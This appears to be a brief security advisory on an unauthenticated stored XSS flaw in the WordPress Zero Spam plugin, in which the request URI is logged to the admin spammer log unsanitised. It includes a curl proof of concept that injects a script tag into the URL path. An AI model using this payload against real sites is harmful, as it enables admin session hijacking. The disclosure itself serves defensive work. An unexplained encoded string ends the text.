WordPress Zero Spam [Unauthenticated Persistent XSS]

Description

This plugin provides a feature to block comments that look like spam. This feature logs any comment that was marked as spam. The logged attempts are accessible in admin panel under Settings → Zero Spam → Spammer Log (options-general.php?page=zerospam&tab=zerospam_spammer_logs).

The $_SERVER['REQUEST_URI'] is not properly sanitized before stored in DB or printed on screen.

PoC

curl 'http://sbwp4.dev/wp-comments-post.php/<script>alert(1)</script>' \
    -d 'comment=pwnd&author=a&[email protected]&submit=Post+Comment&comment_post_ID=1&comment_parrent=0'
WordPress Plugins Unauthenticated Persistent XSS Persistent XSS XSS
INFO
GKxtL3WcoJHtnKZtqTuuqPOiMvOwqKWco3AcqUxX